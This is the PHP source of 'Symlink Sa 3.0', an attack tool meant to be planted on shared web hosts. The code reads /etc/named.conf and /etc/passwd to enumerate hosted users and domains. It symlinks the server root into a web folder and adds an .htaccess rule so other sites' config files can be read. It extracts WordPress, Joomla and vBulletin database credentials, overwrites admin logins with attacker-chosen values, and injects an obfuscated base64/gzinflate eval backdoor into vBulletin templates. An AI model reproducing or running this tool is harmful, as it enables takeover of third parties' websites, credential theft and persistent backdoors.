/* .d8888. d88888b .o88b. db d8b db .o88b. .d88b. .88b d88. 88' YP 88' d8P Y8 88 I8I 88 d8P Y8 .8P Y8. 88'YbdP`88 `8bo. 88ooooo 8P 88 I8I 88 8P 88 88 88 88 88 `Y8b. 88~~~~~ 8b C8888D Y8 I8I 88 8b 88 88 88 88 88 db 8D 88. Y8b d8 `8b d8'8b d8' db Y8b d8 `8b d8' 88 88 88 `8888Y' Y88888P `Y88P' `8b8' `8d8' VP `Y88P' `Y88P' YP YP YP author..............: s3n4t00r home................: sec-w.com twitter.............: @s3n4t00r name tools..........: Symlink Sa v3.0 */ set_time_limit(0); error_reporting(0); $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = explode("/",$pageURL ); $pageURL =str_replace($u[count($u)-1],"",$pageURL ); $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"]; $u = explode("/",$pageFTP ); $pageFTP =str_replace($u[count($u)-1],"",$pageFTP ); ?> Symlink_Sa 3.0
Symlink Sa 3.0
' ; echo '
-:[ User & Domains & Symlink ]:-

' ; echo ''; if(isset($_REQUEST['sws'])) { switch ($_REQUEST['sws']) { /// Domains + Scripts /// case 'sec': if(!@is_file('named.txt')){ $d00m = @file("/etc/named.conf"); }else{ $d00m = @file("named.txt"); } if(!$d00m) { die (""); } else { echo "
"; foreach($d00m as $dom){ flush(); flush(); if(eregi("zone",$dom)){ @preg_match_all('#zone "(.*)"#', $dom, $domsws); flush(); if(@strlen(trim($domsws[1][0])) > 2){ $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); /////////////////////////////////////////////////////////////////////////////////// $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php"; $wpp=@get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php"; $wpp2=@get_headers($wp2); $wp12=$wpp2[0]; /////////////////////////////// $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php"; $joo=@get_headers($jo1); $jo=$joo[0]; $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php"; $joo2=@get_headers($jo2); $jo12=$joo2[0]; //////////////////////////////// $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php"; $vbb=@get_headers($vb1); $vb=$vbb[0]; $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php"; $vbb2=@get_headers($vb2); $vb12=$vbb2[0]; $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php"; $vbb3=@get_headers($vb3); $vb13=$vbb3[0]; ///////////////// $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php"; $whh2= @get_headers($wh1); $wh=$whh2[0]; $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php"; $whh2= @get_headers($wh2); $wh12=$whh2[0]; $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php"; $whh3= @get_headers($wh3); $wh13=$whh3[0]; $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php"; $whh5= @get_headers($wh5); $wh15=$whh5[0]; $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php"; $whh4= @get_headers($wh4); $wh14=$whh4[0]; //////////////////////////////////////////////////////////////////////////////// ////////// Wordpress //////////// $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config="Wordpress"; } elseif (strpos($wp12, "200") == true) { $config="Wordpress"; } ///////////WHMCS//////// elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true ) { $config=" WHMCS"; } elseif (strpos($wh12, "200") == true) { $config =" WHMCS"; } elseif (strpos($wh13, "200") == true) { $config =" WHMCS"; } ///////// Joomla to 4 /////////// elseif (strpos($jo, "200") == true) { $config=" Joomla"; } elseif (strpos($jo12, "200") == true) { $config=" Joomla"; } //////////vBulletin to 4 /////////// elseif (strpos($vb, "200") == true) { $config=" vBulletin"; } elseif (strpos($vb12, "200") == true) { $config=" vBulletin"; } elseif (strpos($vb13, "200") == true) { $config=" vBulletin"; } else { continue; } flush(); flush(); ///////////////////////////////////////////////////////////////////////////////////// $site = $user['name'] ; flush(); echo ""; flush(); } } } } break; /// user + domine + symlink /// case 'sym': if(!is_file('named.txt')){ $d00m = @file("/etc/named.conf"); }else{ $d00m = @file("named.txt"); } if(!$d00m) { die (""); } else { echo "
Domains Script
".$domsws[1][0]." ".$config."
"; foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domsws); flush(); if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); flush(); $site = $user['name'] ; @symlink("/","sym/root"); $site = $domsws[1][0]; $ir = 'ir'; $il = 'il'; if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) { $site = "
".$domsws[1][0]."
"; } echo " "; flush(); flush(); } } } } break; /// file symlink /// case 'file': echo' The file path to symlink







'; $pfile = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink']; if ($symlink) { @mkdir('sym1',0777); $c = "Options Indexes FollowSymLinks n DirectoryIndex ssssss.htm n AddType txt .php n AddHandler txt .php n AddType txt .html n AddHandler txt .html n Options all n Options n Allow from all n Require None n Satisfy Any"; $f =@fopen ('sym1/.htaccess','w'); @fwrite($f , $c); @symlink("$pfile","sym1/$symfile"); echo '
'.$symfile.''; } break; /// bypass read case 'read': echo "read /etc/named.conf"; echo "



"; if(isset($_GET['save'])){ $cont = stripcslashes($_POST['file']); $f = fopen('named.txt','w'); $w = fwrite($f,$cont); if($w){ echo '
save has been successfully'; } fclose($f); } break; // passwd case 'passwd': if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){ $cont = stripcslashes($_POST['file']); if(!file_exists('passwd.txt')){ $f = @fopen('passwd.txt','w'); $w = @fwrite($f,$cont); fclose($f); } if($w or @filesize('passwd.txt') > 0){ // * SHOW * // echo "
DomainsUserssymlink
".$user['name']." symlink
"; flush(); $fil3 = file('passwd.txt'); foreach ($fil3 as $f){ $u=explode(':', $f); $user = $u['0']; echo " "; flush(); flush(); } die (""); } } echo "read /etc/passwd"; echo "



"; flush(); break; case 'joomla': /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx //////////////////////////// if(isset($_POST['s'])){ $file = @file_get_contents('joomla.txt'); $ex = explode("n",$file); echo "
UserssymlinkFTP
$user Symlink FTP
"; flush(); foreach ($ex as $exp){ $es = explode("||",$exp); $config = $es[0]; $domin = $es[1]; $domins = trim($domin).''; $readconfig = @file_get_contents(trim($config)); if(ereg('JConfig',$readconfig)){ $pass = ex($readconfig,'$password = '',"';"); $userdb = ex($readconfig,'$user = '',"';"); $db = ex($readconfig,'$db = '',"';"); $fix = ex($readconfig,'$dbprefix = '',"';"); $tab = $fix.'users'; $con = @mysql_connect('localhost',$userdb,$pass); $db = @mysql_select_db($db,$con); $query = @mysql_query("UPDATE `$tab` SET `username` ='sec-w.com'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'"); if ($query and $query3 ){$r = 'Succeed user [sec-w.com] pass [1]';}else{$r = 'failed';} $domins = trim($domin).''; echo ""; flush(); }else{ echo ""; flush(); } } die(); } if(!is_file('named.txt')){ $d00m = @file("/etc/named.conf"); flush(); }else{ $d00m = file("named.txt"); } if(!$d00m) { die (""); } else { echo "


domin config Result
$domin config".$r."
$domin configfailed
"; $f = fopen('joomla.txt','w'); foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domsws); if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); /////////////////////////////////////////////////////////////////////////////////// $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php"; $wpp=get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php"; $wpp2=get_headers($wp2); $wp12=$wpp2[0]; $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php"; $wpp3=get_headers($wp3); $wp13=$wpp3[0]; ////////// joomla //////////// $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config= $wpl; } elseif (strpos($wp12, "200") == true) { $config= $wp2; } elseif (strpos($wp13, "200") == true) { $config= $wp3; } else { continue; } flush(); ///////////////////////////////////////////////////////////////////////////////////// $dom = $domsws[1][0]; $w = fwrite($f,"$config||$dom n"); if($w){$r = 'Save';}else{$r = 'failed';} echo ""; flush(); } } } } break; case 'wp': ############################ index #########################3 ######## admin ##########33 if(isset($_POST['s'])){ $file = @file_get_contents('wp.txt'); $ex = explode("n",$file); echo "
Domains config Result
".$domsws[1][0]." config".$r."
"; flush(); flush(); foreach ($ex as $exp){ $es = explode("||",$exp); $config = $es[0]; $domin = $es[1]; $domins = trim($domin).''; $readconfig = @file_get_contents(trim($config)); if(ereg('wp-settings.php',$readconfig)){ $pass = ex($readconfig,"define('DB_PASSWORD', '","');"); $userdb = ex($readconfig,"define('DB_USER', '","');"); $db = ex($readconfig,"define('DB_NAME', '","');"); $fix = ex($readconfig,'$table_prefix = '',"';"); $tab = $fix.'users'; $con = @mysql_connect('localhost',$userdb,$pass); $db = @mysql_select_db($db,$con); $query = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die; $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die; if ($query){$r = 'Succeed user [sec-w.com] pass [1]';} else { $r = 'failed'; } $domins = trim($domin).''; echo ""; flush(); flush(); }else{ echo ""; flush(); flush(); } } die(); } if(!is_file('named.txt')){ $d00m = @file("/etc/named.conf"); }else{ $d00m = @file("named.txt"); } if(!$d00m) { die (""); } else { echo "


domin config Result
$domin config".$r."
$domin configfailed2
"; flush(); flush(); $f = fopen('wp.txt','w'); foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domsws); if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); /////////////////////////////////////////////////////////////////////////////////// $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php"; $wpp=get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php"; $wpp2=get_headers($wp2); $wp12=$wpp2[0]; $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config"; $wpp3=get_headers($wp3); $wp13=$wpp3[0]; ////////// wp //////////// $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config= $wpl; } elseif (strpos($wp12, "200") == true) { $config= $wp2; } elseif (strpos($wp13, "200") == true) { $config= $wp3; } else { continue; } flush(); ///////////////////////////////////////////////////////////////////////////////////// $dom = $domsws[1][0]; $w = fwrite($f,"$config||$dom n"); if($w){$r = 'Save';}else{$r = 'failed';} echo ""; flush(); flush(); flush(); } } } } break; case 'vb': if(isset($_POST['s'])){ $file = @file_get_contents('vb.txt'); $ex = explode("n",$file); echo "
Domains config Result
".$domsws[1][0]." config".$r."
"; foreach ($ex as $exp){ $es = explode("||",$exp); $config = $es[0]; $domin = $es[1]; $domins = trim($domin).''; $readconfig = @file_get_contents(trim($config)); if(ereg('vBulletin',$readconfig)){ $db = ex($readconfig,'$config['Database']['dbname'] = '',"';"); $userdb = ex($readconfig,'$config['MasterServer']['username'] = '',"';"); $pass = ex($readconfig,'$config['MasterServer']['password'] = '',"';"); $con = @mysql_connect('localhost',$userdb,$pass); $db = @mysql_select_db($db,$con); $shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ; $crypt = "{${eval(gzinflate(base64_decode('"; $crypt .= "$shell"; $crypt .= "')))}}{${exit()}}"; $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ; $query = @mysql_query($sqlfaq,$con); if ($query){$r = 'Succeed shell in search.php';} else { $r = 'failed'; } $domins = trim($domin).''; echo ""; }else{ echo ""; } } die(); } if(!is_file('named.txt')){ $d00m = file("/etc/named.conf"); }else{ $d00m = file("named.txt"); } if(!$d00m) { die (""); } else { echo "


domin config Result
$domin config".$r."
$domin configfailed2
"; $f = fopen('vb.txt','w'); foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domsws); if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); /////////////////////////////////////////////////////////////////////////////////// $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php"; $wpp=get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php"; $wpp2=get_headers($wp2); $wp12=$wpp2[0]; $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php"; $wpp3=get_headers($wp3); $wp13=$wpp3[0]; ////////// vb //////////// $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config= $wpl; } elseif (strpos($wp12, "200") == true) { $config= $wp2; } elseif (strpos($wp13, "200") == true) { $config= $wp3; } else { continue; } flush(); ///////////////////////////////////////////////////////////////////////////////////// $dom = $domsws[1][0]; $w = fwrite($f,"$config||$dom n"); if($w){$r = 'Save';}else{$r = 'failed';} echo ""; flush(); } } } } break; case 'help': echo "
Domains config Result
".$domsws[1][0]." config".$r."
"; $safe_mode = ini_get('safe_mode'); if($safe_mode){$r = "False";}else{$r = "True";} echo ""; $fun = function_exists('symlink'); if(!$fun){$r = "False";}else{$r = "True";} echo ""; $fun = function_exists('file'); if(!$fun){$r = "False";}else{$r = "True";} echo ""; $fun = function_exists('file_get_contents'); if(!$fun){$r = "False";}else{$r = "True";} echo ""; $fun = function_exists('mkdir'); if(!$fun){$r = "False";}else{$r = "True";} echo ""; $fun = is_dir('sym/root'); if(!$fun){$r = "False";}else{$r = "True";} echo ""; $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root')); if($fun){$r = "False";}else{$r = "True";} echo ""; echo "
functionCase
Safe Mode$r
function symlink$r
function file$r
function file_get_contents$r
function mkdir$r
Permission denied$r
Forbidden$r
"; break; default: header("Location: $pg"); } /// home /// }else { echo '

'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '

Uploaded successful !!

'; } else { echo '

Not uploaded !!

'; } } echo '


Cod3d by S3n4t00r Idea by Mr.Alsa3ek

Sec-w.Com

Muslims Hackers
'; } function ex($text,$a,$b){ $explode = explode($a,$text); $explode = explode($b,$explode[1]); return $explode[0]; } echo '
??????? ???? ??????? ';